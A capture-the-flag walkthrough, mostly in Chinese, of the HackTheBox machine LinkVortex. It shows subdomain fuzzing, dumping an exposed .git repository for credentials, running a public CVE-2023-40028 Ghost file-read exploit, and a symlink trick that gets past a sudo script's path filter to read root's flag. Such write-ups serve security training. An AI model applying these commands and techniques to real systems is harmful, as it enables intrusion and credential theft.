HackTheBox: LinkVortex
HackTheBox: LinkVortex
Table of Contents
[TOC]
Topic
Lab
- HackTheBox:
https://app.hackthebox.com/machines/LinkVortex
Initial Enumeration
● Start Machine: 10.10.11.47
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -Pn 10.10.11.47
Nmap scan report for 10.10.11.47
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_ 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open http Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.69 seconds
SSH, HTTP
編輯 /etc/hosts
┌──(chw㉿CHW)-[~]
└─$ cat /etc/hosts
10.10.11.47 linkvortex.htb
Page 最下面有個 Sign up,但沒有功能
view-source 沒有明顯漏洞
- ffuf path
┌──(chw㉿CHW)-[~]
└─$ ffuf -t 50 -r -w /usr/share/dirb/wordlists/common.txt -u http://linkvortex.htb/FUZZ -e .git,.php,.bak,.zip
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
...
[Status: 200, Size: 12148, Words: 2590, Lines: 308, Duration: 673ms]
about [Status: 200, Size: 8284, Words: 1296, Lines: 162, Duration: 557ms]
About [Status: 200, Size: 8284, Words: 1296, Lines: 162, Duration: 511ms]
favicon.ico [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 498ms]
favicon.ico.php [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 671ms]
favicon.ico.zip [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 671ms]
favicon.ico.bak [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 672ms]
favicon.ico.git [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 672ms]
feed [Status: 200, Size: 26682, Words: 3078, Lines: 1, Duration: 829ms]
LICENSE [Status: 200, Size: 1065, Words: 149, Lines: 23, Duration: 525ms]
private [Status: 200, Size: 12148, Words: 2590, Lines: 308, Duration: 955ms]
robots.txt [Status: 200, Size: 121, Words: 7, Lines: 7, Duration: 317ms]
rss [Status: 200, Size: 26682, Words: 3078, Lines: 1, Duration: 879ms]
RSS [Status: 200, Size: 26682, Words: 3078, Lines: 1, Duration: 565ms]
server-status [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 202ms]
sitemap.xml [Status: 200, Size: 527, Words: 6, Lines: 1, Duration: 766ms]
Solution
1. Searchsploit
CMS: Ghost 5.58
┌──(chw㉿CHW)-[~]
└─$ searchsploit ghost 5.58
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Ghostscript < 8.64 - 'gdevpdtb.c' Local Buffer Overflow | multiple/local/10326.txt
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(chw㉿CHW)-[~]
└─$ searchsploit ghost 5.58
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Ghostscript < 8.64 - 'gdevpdtb.c' Local Buffer Overflow | multiple/local/10326.txt
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
幫助不大
Ghost v5.58 CVE Exploit: CVE-2023-40028 但前提是需要 username 和 password
在查 ghost default login 的過程中,看到可能有 Subdomain [How do I login to Ghost Admin?]
2. ffuf Subdomain
┌──(chw㉿CHW)-[~]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.linkvortex.htb" -u http://linkvortex.htb -c -mc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://linkvortex.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.linkvortex.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
dev [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 1043ms]
編輯 /etc/hosts
┌──(chw㉿CHW)-[~]
└─$ cat /etc/hosts
10.10.11.47 linkvortex.htb dev.linkvortex.htb
沒架完的通常比較有趣 👷🏻♂️
3. dev.linkvortex.htb
- dirsearch
┌──(chw㉿CHW)-[~]
└─$ dirsearch -u http://dev.linkvortex.htb/ -t 50
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460
Output File: /home/chw/reports/http_dev.linkvortex.htb/__25-04-11_07-36-50.txt
Target: http://dev.linkvortex.htb/
[07:36:50] Starting:
[07:36:58] 301 - 239B - /.git -> http://dev.linkvortex.htb/.git/
[07:36:58] 200 - 73B - /.git/description
[07:36:58] 200 - 201B - /.git/config
[07:36:58] 200 - 557B - /.git/
[07:36:59] 200 - 41B - /.git/HEAD
[07:36:59] 200 - 620B - /.git/hooks/
[07:36:59] 200 - 401B - /.git/logs/
[07:36:59] 200 - 240B - /.git/info/exclude
[07:36:59] 200 - 175B - /.git/logs/HEAD
[07:36:59] 200 - 402B - /.git/info/
[07:36:59] 200 - 393B - /.git/refs/
...
確實有趣
瀏覽 http://dev.linkvortex.htb/.git/
4. Gitdumper
┌──(chw㉿CHW)-[~/Tools/git-dumper]
└─$ python3 git_dumper.py http://dev.linkvortex.htb/.git/ HTB
/home/chw/Tools/git-dumper/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://dev.linkvortex.htb/.git/HEAD [200]
[-] Testing http://dev.linkvortex.htb/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://dev.linkvortex.htb/.gitignore [404]
[-] Fetching http://dev.linkvortex.htb/.git/ [200]
[-] http://dev.linkvortex.htb/.gitignore responded with status code 404
[-] Fetching http://dev.linkvortex.htb/.git/refs/ [200]
...
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 5596 paths from the index
目標是要登入 CMS,在 git dump 的資料夾搜尋 admin, password 或 pwd
┌──(chw㉿CHW)-[~/Tools/git-dumper/HTB]
└─$ grep -riE 'admin|password|pwd' .
...
admin@linkvortex.htb:OctopiFociPilfer45
Blowfish 爆破天荒地老
4. 登入 CMS
利用 admin@linkvortex.htb : OctopiFociPilfer45 登入 ghost
5. Exploit
嘗試利用前面已經找到的 CVE Exploit 任意讀檔
┌──(chw㉿CHW)-[~/Tools/CVE-exploit]
└─$ git clone https://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028.git
┌──(chw㉿CHW)-[~/Tools/CVE-exploit/CVE-2023-40028_Ghost-5.58_Arbitrary_File_Read]
└─$ ./CVE-2023-40028 -u admin@linkvortex.htb -p OctopiFociPilfer45 -h http://linkvortex.htb/
WELCOME TO THE CVE-2023-40028 SHELL
Enter the file path to read (or type 'exit' to quit): /etc/passwd
File content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
Enter the file path to read (or type 'exit' to quit):
User: node
嘗試讀取 node SSH id_rsa
Enter the file path to read (or type 'exit' to quit): /home/node/.ssh/id_rsa
File content:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
失敗
/etc/ssh/ssh_config,/root/.ssh/id_rsa也都失敗
回去檢查 git leak 內容
在 Dockerfile 中 config.production.json 會複製到 /var/lib/ghost/config.production.json 路徑下
┌──(chw㉿CHW)-[~/Tools/git-dumper/HTB]
└─$ cat Dockerfile.ghost
FROM ghost:5.58.0
# Copy the config
COPY config.production.json /var/lib/ghost/config.production.json
因此嘗試用 exploit 瀏覽 /var/lib/ghost/config.production.json
Enter the file path to read (or type 'exit' to quit): /var/lib/ghost/config.production.json
File content:
{
"url": "http://localhost:2368",
"server": {
"port": 2368,
"host": "::"
},
"mail": {
"transport": "Direct"
},
"logging": {
"transports": ["stdout"]
},
"process": "systemd",
"paths": {
"contentPath": "/var/lib/ghost/content"
},
"spam": {
"user_login": {
"minWait": 1,
"maxWait": 604800000,
"freeRetries": 5000
}
},
"mail": {
"transport": "SMTP",
"options": {
"service": "Google",
"host": "linkvortex.htb",
"port": 587,
"auth": {
"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"
}
}
}
}
bob@linkvortex.htb:fibber-talented-worth
6. Login SSH
┌──(chw㉿CHW)-[~]
└─$ ssh bob@linkvortex.htb
The authenticity of host 'linkvortex.htb (10.10.11.47)' can't be established.
ED25519 key fingerprint is SHA256:vrkQDvTUj3pAJVT+1luldO6EvxgySHoV6DPCcat0WkI.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:7: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
Last login: Fri Apr 11 11:53:09 2025 from 10.10.14.136
bob@linkvortex:~$ whoami
bob
bob@linkvortex:~$ hostname
linkvortex
bob@linkvortex:~$ pwd
/home/bob
✅ Get User Flag
在
/home/bob找到 User flag
Privileges Escalation
7. Sudo -l
bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
env_keep+=CHECK_CONTENT
User bob may run the following commands on linkvortex:
(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
/usr/bin/bash /opt/ghost/clean_symlink.sh *.png
8. /opt/ghost/clean_symlink.sh
查看 /opt/ghost/clean_symlink.sh 有沒有寫入權限
bob@linkvortex:~$ ls -al /opt/ghost/clean_symlink.sh
-rwxr--r-- 1 root root 745 Nov 1 08:46 /opt/ghost/clean_symlink.sh
NO
查看 Shell 內容:
bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh
#!/bin/bash
QUAR_DIR="/var/quarantined"
if [ -z $CHECK_CONTENT ];then
CHECK_CONTENT=false
fi
LINK=$1
if ! [[ "$LINK" =~ \.png$ ]]; then
/usr/bin/echo "! First argument must be a png file !"
exit 2
fi
if /usr/bin/sudo /usr/bin/test -L $LINK;then
LINK_NAME=$(/usr/bin/basename $LINK)
LINK_TARGET=$(/usr/bin/readlink $LINK)
if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
/usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
/usr/bin/unlink $LINK
else
/usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
/usr/bin/mv $LINK $QUAR_DIR/
if $CHECK_CONTENT;then
/usr/bin/echo "Content:"
/usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
fi
fi
fi
若 CHECK_CONTENT=true(透過 env_keep+=CHECK_CONTENT 保留),則會 cat 出 quarantined 檔案內容
但路徑不能包含etc或root
Symbolic link 可以嘗試繞過
9. Symbolic link
bob@linkvortex:~$ ln -s /root/root.txt chw.txt
bob@linkvortex:~$ ln -s /home/bob/chw.txt chw_flag.png
bob@linkvortex:~$ ls
chw.txt chw_flag.png user.txt
bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/chw_flag.png
Link found [ /home/bob/chw_flag.png ] , moving it to quarantine
Content:
6d3552a7****************
- 建立了一個 symlink
chw.txt指向/root/root.txt- 再建立一個 symlink
chw_flag.png指向chw.txt
間接指到 /root/root.txt
✅ Get Root FLAG
